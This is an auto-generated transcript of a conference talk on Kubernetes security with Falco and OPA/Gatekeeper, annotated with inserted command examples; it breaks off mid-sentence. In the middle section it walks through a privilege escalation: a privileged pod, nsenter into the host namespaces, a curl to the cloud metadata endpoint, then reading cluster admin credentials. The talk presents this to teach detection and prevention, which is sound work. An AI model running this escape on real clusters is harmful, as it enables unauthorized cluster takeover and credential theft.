Fixing the Kubernetes clusterfuck
Formal Metadata
Title: Fixing the Kubernetes clusterfuck
Number of Parts: 490
License: CC Attribution 2.0 Belgium: You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Identifiers: 10.5446/47436 (DOI)
Transcript: English (auto-generated)
00:05
So, hi, my name is Chris Nova, second time here at FOSDEM presenting. I gave a talk last year, show of hands, who has seen it, yep, it was a good one. We explored, well, y'all ran the track, so thank you, but we explored some anti-patterns
00:22
and some exciting things in Kubernetes. Since then, Kubernetes has grown a lot, I've grown a lot, and the entire cloud-native ecosystem has also grown tremendously. So we're going to be looking at some more concepts tonight, something that I've been thinking about and studying for about the past six months, and we're going to look at
00:41
some Cloud Native Computing Foundation open source tools, including Kubernetes, including the Open Policy Agent, and I'm going to try to be diligent about calling it the verbose name, Open Policy Agent, but you might hear me refer to it as OPA as well, and some other exciting tools in the ecosystem, including the Linux kernel.
01:03
So to start off, shout out to my friends over in this section who gave me some delicious cookies and chocolate before I came on stage, and also we have the two Falco maintainers here in the front that have some Falco stickers, and Francesc and Macha have some over there, so throughout the talk, if you see stickers come your way, feel free to grab one and
01:21
stick it on your laptop, and you're going to be learning more about Falco and these other projects tonight. All right, so the first thing I'm going to do is I am going to open up my slides. Okay, so this is our first slide here. So yeah, it's called Fixing the Kubernetes Clusterfuck, which I think is a funny way
01:44
of basically alluding to Kubernetes is complex, and it's complex for a good reason, and because of this complexity, it actually is a very powerful tool, which is why I've been working on it, and that's why I love it so much and why I've been so diligent about being involved with it and using it.
02:01
So in a weird way, this complexity can potentially scare folks or cause problems, but we're going to look concretely at some ways in which the complexity, particularly around security, is something that a lot of people, I've noticed, may not necessarily be an expert on. I don't even know if I would call myself an expert, but I've been studying it for
02:23
quite some time, and I'm going to share with you today everything that I've found. So yeah, I wrote a book called Cloud Native Infrastructure, which is how I got into this whole Kubernetes thing, and one of the things that I noticed in Kubernetes that hasn't really been solved is this concept of security, and what does security mean
02:43
to me? As an infrastructure engineer, it was basically like, I don't want anything happening in my system that I feel like should not be happening or that I don't know about or have visibility into, and I would like a convenient way to control that layer of security. So recently, I've become a maintainer of an open source project called Falco, and
03:04
I've been a maintainer of other tools in Kubernetes and other projects I've contributed to across the ecosystem for the better half of my adult life, and all of this kind of alludes to this idea that I fancy myself a hacker in the sense that I see something I don't understand, and I sit there and hack away at it until I finally understand it.
03:22
So the two words I want everyone to think about today. The first word is prevention, and the second word is detection. And we're going to really explore these two words and what they mean from a security context, and we're going to actually go through and do a live demo where we take a Kubernetes cluster set up with Kubernetes cops with the default configuration.
03:46
We're going to exploit the prevention techniques, in other words, we're going to hack into the Kubernetes cluster live on stage, and then we're going to look at how Falco was able to detect this malicious behavior, and we're going to look at how we can use what's coming out of Falco to draft policy using
04:01
preventative tactics downstream to prevent this from happening again. Hopefully, when I get done doing this, you'll walk away from here saying, as an infrastructure engineer, as a software engineer, as a general Kubernetes user, I would fancy a cluster to have both of these for a complementary, holistic approach to securing and understanding my Kubernetes system.
04:26
Okay, so everybody, this is the time where you take your phone out. Everything that I'm about to do, including these slides, including links that I'm going to reference, including talks that I think you should go see, including links to my GitHub, my Twitter. Everybody's getting their phones out now.
04:41
I'll get mine out just so that you don't feel lonely. And everything is there. So if you go to github.com slash Chris Nova slash public speaking, I'm going to do some remote command injection here by hitting the space bar. And of course, my internet's not working.
05:00
Hold on. No, it's okay. We're going to need it. I don't use the FOSDEM Wi-Fi, so give me like two seconds. But anyway, if you go to this website, at the very top, I changed, there it goes. I changed the title here to go to the actual, there's my iPhone. The link in the repo that has everything that I have checked out locally.
05:24
So if you want to go and follow along all of the notes, all of the markdown, everything exists here, including the samples that we're going to be going through tonight. Okay, so let's go back to my slides here.
05:51
So the first word, prevention. Words that come to mind when I look at preventing unwanted behavior are locks, right? If you want to keep somebody out, you lock the door. It's very easy, it's low hanging fruit, and most doors and
06:02
most access to our systems have a concept of a lock on it. If you look at Linux fundamentally, right? There's different ways of locking either users or applications out of what we do not want them doing in the kernel. Show of hands here, who's created a user in Linux before? Okay, everybody at FOSDEM just put their hand up.
06:21
Who here has written SELinux policy, seccomp policy, seccomp BPF policy? One person, two, three, okay, four. Okay, so again, if you go and you do some research here, you'll understand that we're preventing unwanted behavior, or at least we're attempting to, and that's kind of the lesson here.
06:40
If you did not want a user to access something on the file system, you could create a user, change the permissions. There's this whole fundamental paradigm in place that allows you to prevent people from doing things they shouldn't do. You can also do this with an application, right? So seccomp BPF actually gives you a way to go through and control which system calls an application could or could not execute.
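As a small aside (my example, not from the talk), a minimal Docker seccomp profile that blocks the chmod family of system calls while allowing everything else looks like this:

# Hypothetical example: a tiny seccomp profile that returns EPERM for chmod calls.
cat > no-chmod.json <<'EOF'
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    { "names": ["chmod", "fchmod", "fchmodat"], "action": "SCMP_ACT_ERRNO" }
  ]
}
EOF

# Run a container under that profile; the chmod now fails with "Operation not permitted".
docker run --rm --security-opt seccomp=no-chmod.json alpine chmod 700 /etc/hostname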
07:02
If you look at cgroups, right, in the Linux kernel, you could define arbitrary limits for what you want applications that are running within the context of the cgroup to be bound to. And if they violate this limit, the kernel's going to terminate the process. So we have these fundamental paradigms in Linux that we're all familiar with. And if you follow along in Kubernetes, you will see that Kubernetes and
07:24
cloud native ecosystem is following in the footsteps of the Linux operating system. Seccomp is to Kubernetes as OPA, Open Policy Agent, is to cloud native. Or, I'm sorry, seccomp is to Linux as OPA is to cloud native. So that's this concept of access control, policy enforcement.
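And for the cgroup limits he just described, here is a minimal sketch (my example, assuming a cgroup v2 unified hierarchy mounted at /sys/fs/cgroup):

# Create a cgroup, give it a 64 MiB memory ceiling, and move the current shell into it.
sudo mkdir /sys/fs/cgroup/demo
echo $((64 * 1024 * 1024)) | sudo tee /sys/fs/cgroup/demo/memory.max
echo $$ | sudo tee /sys/fs/cgroup/demo/cgroup.procs
# Anything started from this shell that exceeds 64 MiB is now OOM-killed by the kernel.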
07:41
We also have this idea of image and artifact scanning, right? So in traditional ecosystems, if you wanted to deploy a new application, you might wanna go through and actually look at the byte code to see if anything in there looks suspicious. There's a well-known set of libraries that are open source on the Internet that you can go and you can actually assert your binaries against,
08:02
whether it's Java byte code or it's good old-fashioned machine byte code. And you can actually see if there's anything buried inside of that that you potentially would not want there. We have the same concept with images in a cloud native ecosystem. The same paradigm applied in a different, more distributed way. Code reviews, right? So you and your team going and looking at what the actual code does.
08:22
Is there any vulnerabilities? Are you catching your errors? Do you have exposed sockets? What happens if somebody floods the socket? Just being security minded throughout your day to day life is another big thing that I've been obsessing over. So these are all tools that you and your team can use to prevent unwanted behavior. But as we all know, bad things can still happen.
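For the image and artifact scanning mentioned a moment ago, one concrete way to do it today (my example; the talk doesn't name a specific scanner, so Trivy here is just an illustration, and the registry/image names are placeholders):

# Scan a container image for known CVEs before you ship it.
trivy image alpine:3.10
# A non-zero exit code can gate a CI pipeline on serious findings:
trivy image --exit-code 1 --severity HIGH,CRITICAL myregistry.example.com/myapp:latest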
08:43
CVEs still happen, right? There's no such thing as perfectly safe and perfectly secure and perfectly perfect software, right? FreeBSD, Linux, Kubernetes, name an open source project, Jupyter notebooks, they've all had CVEs opened up against them. They've all been exploited at one point and they've all been fixed.
09:01
But somebody had to discover this first. So this concept of detection is the scientific approach to looking at our systems from the bottom up instead of from the top down. So by taking things that we would otherwise be effectively blind to and asserting rules against them and using those signals for data processing,
09:23
we're actually able to see things in our system that we otherwise would not be able to see. And so detection is this approach to looking at our system and saying 99% of the time it behaves in this way given these input signals. But on Tuesday, last week, all of a sudden this happened and
09:43
we have never seen this before and we weren't expecting this to happen. And we can programmatically assert that there was, we would call this an anomaly, that there was an anomaly that happened in our system. And that is where detection comes into play. So some people use tools like observability to do this, right?
10:00
So whether we're auditing cloud infrastructure, or the application itself, or the Linux kernel that you're running on, or the Kubernetes audit logs, we basically just wanna have visibility into our system with high cardinality across the whole stack. We also look at things like intrusion detection, right? There's been a couple of exploits over the past year where folks have found out
10:24
that people scan images, so people scan PDFs. And if you upload an image with thousands of URLs buried inside of it, or a PDF with thousands of images buried inside of it, you can effectively DoS someone unintentionally or intentionally. So there are ways of getting things into a secure system, and
10:41
you may not be aware of a certain vector. So security is this whole concept of studying these attack patterns and the humanistic approach to how somebody might think of being intrusive in your systems, and so I've done that with Kubernetes. And I think the approach to preventing this from happening, to securing this,
11:02
and detecting something that is malicious that could be going on, is this word that I have been using that I would like to start advertising, pull requests accepted if you don't like it, called runtime security. That is a hybrid of both. The practice of using something like Kubernetes access control or
11:21
policy enforcement to prevent unwanted behavior, but also understanding that in some cases that might not be enough. So we can begin to use tools like observability tooling, like Falco, what you're gonna see in a moment, to actually audit the kernel and understand what's happening in our system. And I believe that having both of these creates a set of checks and
11:42
balances where an operator or an infrastructure engineer could go in and not only prevent unwanted behavior, but detect it. And then after they've detected it, go through and create new policy to prevent it from happening again. And I think this is a complementary approach to understanding our systems and to securing our systems moving forward.
12:02
Okay, so I'll give you the 30 second pitch on Falco. Don't worry, we're gonna compile it and actually run it so you'll be able to see concretely what it does. It's a CNCF incubation project. Who here has run Wireshark before? Okay, I really wish we could have seen that, but
12:20
everybody in this giant auditorium just put their hand up. So Loris Degioanni, my boss, the founder of the company I work for, Sysdig, was one of the original creators of Wireshark. He has his PhD in Linux. And his original thesis for solving this problem of understanding our systems was that TCP is the fundamental packet of truth, right? It's the atom, it's the quark,
12:41
if you're into quantum mechanics, of how we understand computer science. As we moved into cloud native, as we moved into computers, we realized that the network isn't necessarily the ultimate source of truth anymore. What we did is we started to look at kernel tracing. Who here is familiar with kernel tracing? Okay, so maybe a third of the room just put their hand up.
13:01
They all put their hands up. And there are a couple avenues for how you would potentially trace events in the kernel. But the idea here is that if all software ultimately flows through the system calls in the Linux API interface, by auditing these system calls at runtime, we should be able to understand exactly what's going on in the system and gain otherwise unavailable information about what potentially is happening.
13:25
So this is where this whole observability thing comes into play. So Falco has taken this enormous onslaught of data from the kernel globally. So if you use something like ptrace, I mean by definition p stands for process, it's concretely married to a process itself with a PID.
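For example (my illustration, not a command from the talk), ptrace-based tooling such as strace is inherently scoped to a single process:

# Trace only the open/openat calls of one PID (1234 is a placeholder) -- you see that process and nothing else.
sudo strace -f -e trace=openat -p 1234
# Falco's kernel module or eBPF probe instead sees every syscall on the host, from every process.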
13:42
What Falco and what the Sysdig CLI tool does is it has some libraries that allow you to go through and globally audit what's happening in your kernel. The two ways we do this is by either running a kernel module or by using a newer technology called eBPF that allows us to implement
14:00
kernel tracing in user space so that we can understand what's going on in the kernel. What Falco does is it takes this stream of data, these signals from Linux, and it asserts them against well-known anomalies, right? What happens if somebody executes open, the open system call, against /etc/shadow? Do you and your team wanna know about that?
14:21
I probably would. And if you're savvy, I got to use the word savvy in my presentation, if you're a savvy Linux user, you could probably find ways of doing this on a system with the system and user space not being aware that you did this. But the kernel ultimately would have to execute the system call. So by going to the kernel level,
14:41
you're able to see things you would otherwise be blind to. So again, it's an evolution of Wireshark but for the kernel, and this allows us to begin kernel tracing. So how does it work? So Falco takes not only information from the kernel, but also other bits of information from a containerized system as well.
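To make that /etc/shadow example concrete, a custom Falco rule for it might look roughly like this — my sketch, not a rule taken from his slides, and the rules.d path assumes Falco's default configuration:

# Alert whenever any process opens /etc/shadow.
sudo tee /etc/falco/rules.d/shadow.yaml > /dev/null <<'EOF'
- rule: Shadow file opened
  desc: Someone read /etc/shadow
  condition: evt.type in (open, openat) and fd.name = /etc/shadow
  output: "/etc/shadow opened (user=%user.name command=%proc.cmdline container=%container.name)"
  priority: WARNING
EOF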
15:00
And we're just using what's going on in the kernel to tell a broader story about how we would potentially be detecting anomalies in Kubernetes. I like how people are taking photos of my very professional ASCII diagram on the screen here. I mean, come on, I went through and actually centered this with spaces and counted the spaces. This took at least 20 or 30 minutes.
15:23
So on the left side here, we have system call events, which is what I basically just described. We also can parse other bits of meta information from our systems as well. Who here has ever explored the Docker socket? And another third or so of the people here. If you can actually go and connect to the socket, you can actually get all kinds
15:42
of interesting meta information about the containers that are running on the system. Kubernetes also gives us some visibility as well. We have Kubernetes meta information. What is the name of the pod? When was it started? How long has it been running? What namespace is the pod running in? And we also have this new feature in Kubernetes called Kubernetes audit
16:02
logs that basically give you the who, what, why, and where of something happening, of some mutation in your infrastructure in your system. So if you ever go and follow the tutorial online and blindly download a YAML manifest and apply it to a cluster and just kind of hope it works, which we've all done before, I'm sure, what's actually happening is you're
16:22
mutating the data store in Kubernetes and then all these little controllers come out and they go and they try to reconcile this new configuration that you've pushed to your cluster. And if you're lucky, it should work. So by having the central database, we're able to tell an even broader story about what's happening in our system. So all of this data comes into Falco, which is written in C++ and
16:44
it's highly optimized for efficiency here. I mean, we're dealing on the order of magnitude of millions of system calls, potentially a second, coming up from the kernel. And how it comes up from the kernel is over a ring buffer. And Lorenzo Fontana, probably the most technical maintainer on the Falco project sitting in the front row here, that's an inside joke of ours.
17:03
He gave a wonderful talk earlier today about eBPF. He literally wrote the book on BPF. It's on the slide I asked you to take a picture of; you can go watch his talk. And he goes into much more detail here. But basically, we have a 16 megabyte ring buffer per CPU running on our system.
17:20
I'll show you concretely in a moment what that looks like. And we're able to pull these system calls up through that, combine that with Kubernetes information, combine that with the container information, and then assert this against well-known security anomalies. Once an anomaly is detected, there's a few things Falco allows us to do.
17:40
Fundamentally, Falco is designed to be composable, so you can take an output from it and you can plug it into anything you want. The first one we see on the screen is gRPC. This is relevant because this has allowed us, using tools like Protobuf, to easily build clients and SDKs for you to plug Falco outputs into other arbitrary parts of your system. Right now we have Rust, Go, Python, and
18:02
if you would like to generate your own, pull requests are accepted. We also have a concept of a webhook, of actually going out and trying to send data to a configured web server. And in this example that I'm gonna be running today, good old standard out, which we're just gonna look at in the terminal here. So again, to summarize, from the bottom up, we have the Linux kernel.
18:25
On top of the kernel, we have either a kernel module, which we'll go more into what that looks like in a moment, or an eBPF probe. Then we go into our ring buffer that basically runs on that thin layer between the kernel and the rest of user space, and we move up into user space where
18:41
we have two libraries that are able to pull information from the ring buffer. And then ultimately, Falco is built on top of all of these libraries, and allows us to interface with Kubernetes and Docker, and actually tell a full holistic security story. So to summarize, Falco is a static binary.
19:02
You can run it potentially in a container. It's written in both C and C++. We have Rust, Go, and Python clients, and this whole thing has been optimized for speed. github.com/falcosecurity if you wanna see more. So let's talk about the kernel module. So what this does is this parses system events.
19:23
So kernel modules were our first approach at how we would go about configuring custom logic in the kernel. There's a fundamental problem with this, which is if you're running a potentially unknown kernel configuration, or if something happens on your hardware, or something that you didn't plan for happens in your kernel module, you can potentially crash a system.
19:42
Furthermore, imagine me, a security engineer, walking into a company and saying, hi, download our kernel module from the Internet and install it in production. We promise that's gonna be a good idea. So this problem is why eBPF is so successful.
20:01
eBPF says, we're gonna take the BPF, Berkeley Packet Filter, and we're gonna go a step further, and we're gonna start to build more logic and more capabilities into this very old, otherwise relatively unused part of the Linux kernel. And what we're gonna do is we're gonna guarantee a few things. And particularly, we're gonna solve this kernel module problem of, if you want to do certain things,
20:21
we're gonna prevent you from being able to crash a system. So we started to play with eBPF. So we wanted this to do the same thing that our kernel module was doing. We wanted to parse these system calls because we have found that this is actually a good source of truth for doing things like detecting anomalies. And we also wanted to make sure that we couldn't potentially crash a system.
20:42
So because eBPF code is already pre-compiled into the kernel, you're effectively just telling the kernel to turn it on, right? It's just like JavaScript running in your browser. It's just saying, you already have this logic, just please do this one thing for me instead of please run this logic I wrote myself. So BPF, or eBPF rather, it's unable to crash the kernel.
21:02
It's effectively read-only, and it's not Turing-complete. But you're still able to do some pretty powerful things with it. And then once you get it from the kernel, you can implement that in a Turing-complete language of your choice. So if you wanna look more, go to the open source project and check out scap.c and scap_bpf.c.
21:21
Who here remembers Wireshark cap files? Same concept, but with BPF and for the Linux kernel. So earlier today, I met with a guy, Gress, if he's here. Thank you for helping me out earlier. And he helped me get OPA, or Open Policy Agent, set up for my demo. And we're gonna actually hack into Kubernetes, and
21:41
then we're gonna go through and use this to prevent my hack from happening again, and we're gonna run a series of experiments here. So more on OPA in a moment, but basically it's a CNCF project, just like Falco, and it works with more than just Kubernetes. So it doesn't have to work for Kubernetes, although in this example we're using it. And it was designed to basically just solve the problem of creating
22:03
a policy engine that we could implement anywhere. So one policy engine to rule them all is basically what I think of when I think of OPA. Gatekeeper, an open source tool, is an implementation of this broader policy enforcement mechanism. And Gatekeeper is specifically coupled with Kubernetes, and
22:22
that's what we have running in my cluster. So if you wanna run something like OPA in Kubernetes, Gatekeeper has sort of taken this existing, more flexible, more modular project and optimized it for the single concrete use case of Kubernetes. Okay, so let's talk about my demo.
22:41
Looks like we are 25 minutes into my talk, so I'll probably do another 10 or 15 minutes here of this demo, and I'm gonna go pretty fast. So I'm gonna leave some questions at the end, so if something doesn't make sense or if I skip over something, please either ask me afterwards so I can document it on the Internet. I'm sure you're not the only one who had this question, or
23:01
even put your hand up at the end, and I'm happy to answer quickly at the end of the demo. But what we're gonna do is we're gonna start off by showing you how we're doing some kernel tracing on my local laptop here. So I'm running Arch Linux, I have a fairly old kernel, not too old, but also not brand new to kind of demonstrate what I would think most people are running in production.
23:21
And we're gonna create /usr/local/bin/fosdem on a couple of different environments. The first one on my local laptop, and we're going to parse this using the kernel module. And you're gonna see the devices, and you're gonna actually watch me load the kernel module on my laptop. The next one, we're gonna start Falco with BPF, and I'm gonna delete the kernel module, and you'll see the devices go away.
23:42
And you'll see Falco still working dynamically, which is exciting because we didn't have to load anything into the kernel. Next, we're gonna do this in Kubernetes again. And we're gonna do this by, we're gonna have a cluster administrator kubeconfig configured, which is basically like root on my Kubernetes cluster.
24:01
And then I'm going to use Kubernetes access control and prevention techniques, RBAC, to create a new configuration that only gives me access to one namespace in Kubernetes. I'm then going to create a shell in Kubernetes, privilege escalate through that shell, gain access to the underlying node,
24:20
get root access, all of which should have been reasonably prevented, given Kubernetes RBAC. After we do this, and I've hopefully sufficiently scared a number of people in the room here, we're going to go through and we're gonna look at the OPA policy and the Gatekeeper policy for preventing this from happening again.
24:40
And we're gonna look at how Falco, the whole time, had every system call and was able to tell a story about what happened. And basically explained the threat model and the attack vector for what was happening in Kubernetes. Okay, so done with my slides. So the first thing I'm gonna do is I am going to show you my /dev
25:04
on my file system here, can everybody see okay? Cool, cd /dev. You can see here, we're looking for Falco down here in these devices. And if you notice, you don't see them. So next, I'm gonna go to this directory in home here.
25:23
And you're gonna see I have two pre-compiled objects here. One of which is a kernel object that we're gonna load as a kernel module. And the other one is just a regular old ELF object. And we're gonna use both of these, respectively, as we start running Falco. And so, what I wanna do is I'm gonna just run sudo falco and
25:43
we'll see what happens. Let me enter my password here. And you can see here we got an error, unable to open device falco0. Remember earlier I mentioned a 16 megabyte buffer per core. I have eight cores on this machine, so we're looking for zero through seven, right, zero-indexed device files that do not exist.
26:02
So, what we're gonna do is we're gonna insmod falco-probe.ko. And if I lsmod and we grep for falco, you can see it's loaded.
26:22
And if I ls /dev again, you can see here, we now have Linux devices for every one of my CPU cores. So now, we have something that's coming from the kernel. And this ring buffer is iterating around and around over itself in 16 megabyte increments, and nothing is pulling from it. So we start Falco, and now we're actually able to gain data.
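Condensed, the sequence he just ran, plus the eBPF variant he switches to next, looks roughly like this (my sketch; file and module names come from his local build, so treat them as placeholders):

# Kernel module path: load the probe, confirm it, and watch the per-CPU devices appear.
sudo insmod falco-probe.ko        # the pre-compiled kernel object from his home directory
lsmod | grep falco                # module is loaded
ls /dev | grep falco              # falco0..falco7 -- one 16 MiB ring buffer per CPU core
sudo falco                        # Falco now consumes events from those devices

# eBPF path: no module needed -- point Falco at a pre-compiled BPF object instead.
sudo rmmod falco_probe            # module name after insmod falco-probe.ko; adjust if yours differs
sudo FALCO_BPF_PROBE=./falco-bpf.o falco   # the .o name here is a placeholder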
26:44
So Falco is doing nothing, right? Nothing's happening on my system. I'm running a pretty primitive system here. I have an IDE and a couple of folders open from when I plugged my phone into my laptop. But even if I had Chrome running right now, you would see some setgid calls and
27:00
you would see Falco starting to alert us that something was happening. So for our first experiment, in a different terminal, sudo, or actually we'll do this without sudo first. Touch /usr/local/bin/fosdem. Permission denied. Linux is using preventative action to keep us from doing something that we
27:20
shouldn't be doing. We escalate to a superuser. We happen to know the password. We're able to create the file. Falco alerts us. Pretty simple alerting mechanism here. And you can see here that because this was a well-known directory, I'm sure most people in the room here are familiar with /usr/local/bin or /usr/bin, as well as maybe some other files on the system,
27:41
such as /proc or /dev. There's a lot of things that you would potentially want to know about if somebody's executing open system calls on some of these directories or on some of these files. Perhaps PID 1 would be of interest for some folks. So we're able to take this a step further. So we're gonna keep Falco running, and I'm gonna get some space in here so
28:01
you can see the alert as it comes. And this time, I'm gonna run a Docker container locally, and we're gonna perform the same experiment. And I want you to see how the Linux kernel treats a containerized instance versus a local instance, because this is the fundamental technology that empowers all of the security parsing that we're doing. So I'm going to docker run -it.
28:22
I have what I call my hack container. But basically, this is a container that just has netcat and nmap and some bash aliases and a lot of goodies that I use to explore Kubernetes. And I just push this whenever I make a change to it. So I'm gonna run this locally. You can see here I've got two commands that might be interesting to you that
28:42
we're gonna use in a moment when we run in Kubernetes. And you can see I'm root here on my system. If we uname -a, you can see I'm running Manjaro Linux kernel 4.19, and this is the kernel on my system, right? This isn't some newly invented magical virtual kernel or anything.
29:01
This is just the application running in the context of cgroups and namespaces interfacing with my existing kernel. So, touch /usr/local/bin/fosdem, you can see here. Except for this time, if you look at the end, you can see we're able to get information from the Docker context. We're able to get the name of the image that executed this command,
29:22
as well as the image ID. So, Falco starts to pull information from our system as things happen at different layers. And if it's running locally, we're able to audit it. But if it's running in a container, we're able to get even more information from the data streams that exist in a containerized environment. Okay, so let's do this in Kubernetes.
29:43
So, I'm gonna go back to my public speaking repo here. Slides, clusterfuck, cool. And I'm going to alias k=kubectl.
30:00
I'm going to k get pods. So, gosh, FOSDEM, Wi-Fi, come on. There we go, no resources found. I'll try to keep the Internet to a minimum here as we wrap up my talk. But you can see there's nothing running in the default namespaces. And I'm gonna use namespaces as a way to demonstrate that I do in fact have global privileges on this Kubernetes cluster on this system.
30:26
So, I'm going to list namespaces. So, k get namespaces, and you can see here I have Falco in the falco namespace, Gatekeeper and gatekeeper-system all installed. So, if I go to my config directory, .kube, .config, sorry, .kube, and listing here,
30:46
you can see I have config, config admin, and config default. Admin is the one I'm using now, but if we copy config default over here, it's still gonna be interacting with the same Kubernetes cluster,
31:01
except this time we're gonna be using a different service account, which means this user that I'm now running as should not have access to these namespaces. And the simple trick here is we should not be able to list namespaces. So, k get namespaces, and you're gonna notice and see that the Kubernetes API server rejected this request.
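That rejection comes from RBAC. As a sketch (my example with made-up names, not his exact manifests), the kind of Role and RoleBinding that pins a service account to a single namespace looks roughly like this:

# Hypothetical Role/RoleBinding: the "default" service account may only touch pods in "default".
kubectl apply -f - <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader
  namespace: default
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: pod-reader-binding
  namespace: default
subjects:
- kind: ServiceAccount
  name: default
  namespace: default
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io
EOF
# Anything outside the "default" namespace -- like "kubectl get namespaces" -- is rejected.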
31:21
It's preventing us from doing something it doesn't want us to do. But, as a savvy computer user, we understand that there may or may not be ways around this. So, let's go now, still as my default user, without access to the rest of the namespaces in my cluster, we can list pods, and we can list pods in the default namespace fine,
31:42
but if we tried to list pods in a different namespace, we happen to know Falco exists, you'll see again that it's going to get rejected. So, here in my clusterfuck-fosdem 2020 directory, I have a small bash function called shell. And you go in here and you can see that we have some very interesting
32:03
configuration bits defined, as well as that same hack container image that I ran moments ago on my local laptop, and we're gonna run this in Kubernetes. There's a few bits of configuration here that we're gonna prevent from happening again using a tool like OPA, which is this very lovely
32:22
security context privileged equals true. So, Kubernetes is an abstraction, right? And because of this abstraction, you may not quite understand truly what's going on as you go down to the internal layers of the system that's running Kubernetes. And basically what's happening here is that we're able to go through
32:41
and escalate privileges and exploit this cluster. So, I have five minutes left, and then we have 10 minutes for questions. So, I'm gonna go pretty quick here. So, what we're gonna do is we're gonna run this function shell. First, we're gonna source it. Now, we're gonna run shell. And so, what this is doing is it's basically creating a TTY
33:00
in my container image running in Kubernetes, and here I am. I'm root@shell. As the user in the container, I can do an ls, and you can see that I'm in the root file system of my Linux system. But if I cat out /etc/motd, you're gonna see there's two commands here
33:20
that we're gonna use. Because privileged is equal to true, I'm able to go through, and I'm able to jump into the PID 1 namespace as well as the mount, the user, and the network namespaces, and I'm able to basically build a TTY through this, such as this.
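The escape he's describing, as a sketch: this assumes the pod is both privileged and shares the host PID namespace (hostPID: true), which is among the "interesting configuration bits" in his shell function; it is not his exact script, and the names are made up.

# Hypothetical privileged pod that can reach the node's namespaces.
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: shell
spec:
  hostPID: true
  containers:
  - name: shell
    image: alpine            # his demo used his own "hack" image; any image that ships nsenter (util-linux) works
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
EOF

kubectl exec -it shell -- sh
# From inside the container, join PID 1's mount, UTS, IPC, network, and PID namespaces:
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# You are now effectively root on the underlying node.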
33:43
So now, I'm actually gonna do this with bash at the end, sorry. /bin/bash. Now, you can see I'm at IP 172.20.35.32, which if you've ever run an EC2 instance before, you'll know that this looks like a default-VPC Amazon instance IP.
34:04
And if I list where I am, you can see now, I am actually on a different file system than I was before because I escalated to the mount namespace that the container had access to using nsenter. To give you an example of where I am and what's going on, I'm gonna do a docker list, sorry, docker ps,
34:29
and you can see all the containers running in Kubernetes as the user of the Linux system that Kubernetes is running on top of. In Amazon Linux, there is a well-known IP address
34:40
that looks like this. Thanks, I'm just gonna do this so I can copy it. Sorry, I'm trying to go fast here. Oh, thanks, I know, I know. Cat /etc/motd, sorry, FOSDEM Wi-Fi is hard.
35:03
We're gonna run our nsenter again, run our curl, and then we're gonna actually build this request. We're gonna go to the 2019-10-01 API. You see here we have user space. This is where things are about to get exciting.
35:21
Did I spell this wrong? I hear a lot of mumbling, but I can't understand. Data, user, oh, user-data, thank you. All right, there we go. So if we scroll up, this is the configuration file that kops used to bootstrap Kubernetes. As I get this from the Amazon meta information,
35:41
I come in here and I can actually see that this was hard-coded on the system, and we have not only privileged equals true, so we're gonna do a grep -i priv, but we can actually grep -i config, and you can see that I was able to get the kubeconfig path on the system
36:01
and cat this out here. Poof, root cluster access from kops running in Kubernetes, what I would otherwise not have access to. There's my cert material there on the screen. I would be able to copy this down locally and basically escalate my way to the rest of the cluster and exploit Kubernetes while it's running unsecured.
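Condensed, the steps from inside that node shell were roughly the following (my sketch; 169.254.169.254 is the standard EC2 instance metadata address, and the kubeconfig path is a placeholder for whatever the grep reveals):

# 169.254.169.254 is the well-known EC2 instance metadata address.
curl -s http://169.254.169.254/latest/user-data > user-data.txt   # the kops bootstrap configuration
grep -i priv   user-data.txt     # shows privileged settings baked into the node configuration
grep -i config user-data.txt     # reveals where the kubeconfig lives on the node
cat <kubeconfig-path-from-grep>  # placeholder: cat whatever path the previous grep revealed
# That file holds the cert material he shows on screen -- root access to the whole cluster.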
36:23
So if you're not already preventing this from happening, I'm gonna show you how to do it. So what we wanna do is we're gonna go back to this directory here, and I have some OPA policy that's going to get installed with Gatekeeper that if you wanna go and actually look at what it's doing, it's a lovely set of default policy,
36:40
and we're just gonna k apply -f gatekeeper.yaml, and what this is gonna do, remember, I'm still this default user, but I was able to escalate my way through to get the root config. What OPA's gonna do now for us is it's gonna prevent this from happening again. Why did this not work?
37:05
Oh yeah, thank you. It doesn't work because RBAC is preventing us from taking action as this default user. Nope; copy the admin config back to kubeconfig, yes, run this again.
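For reference, a Gatekeeper policy that blocks privileged containers looks roughly like this; it's adapted from the public gatekeeper-library examples and is not necessarily the exact gatekeeper.yaml he applied:

kubectl apply -f - <<'EOF'
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8spspprivilegedcontainer
spec:
  crd:
    spec:
      names:
        kind: K8sPSPPrivilegedContainer
  targets:
  - target: admission.k8s.gatekeeper.sh
    rego: |
      package k8spspprivileged
      violation[{"msg": msg}] {
        c := input.review.object.spec.containers[_]
        c.securityContext.privileged
        msg := sprintf("Privileged container is not allowed: %v", [c.name])
      }
---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPPrivilegedContainer
metadata:
  name: deny-privileged-containers
EOF
# With this constraint in place, a privileged pod like the "shell" one is rejected at admission.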
37:25
And so now OPA's gonna prevent us from taking action again, and if I try to run my shell again, you're gonna see here it's effectively denying this request. So what does Falco have to say about all of this? So I have an alias here called falcologs,
37:41
and if I can run that, and basically all it does is it's gonna run k logs, with the label app equal to falco, in the falco namespace, with -f, and this is where the whole lesson comes to life, right? This is where we can actually see from the Linux kernel
38:02
what was happening on those systems that are echoing these alerts out to standard out, and we're actually able to create this policy to prevent it from happening again. So the story here, if we look at our alerts that we're getting, it's pretty concerning. First, my container happened to wipe our bash history
38:20
away, and we're starting to get information from Kubernetes and from Docker. We're going through and we're creating new shells. We started a privileged container. Falco was able to alert that to us as well, and here at the very end, you can see the big exploit itself, the privileged container attack, and that's where I started to escalate into different parts of the system.
38:42
So the story here, the threat model here, is that there are ways of hacking around things if you're not taking preventative action, but in some cases even that might not be enough, and so being able to detect these types of events and these types of anomalies using tools like eBPF allows you to do it in a safe way so that you and your team and your infrastructure can begin to have this sort of checks and balances
39:02
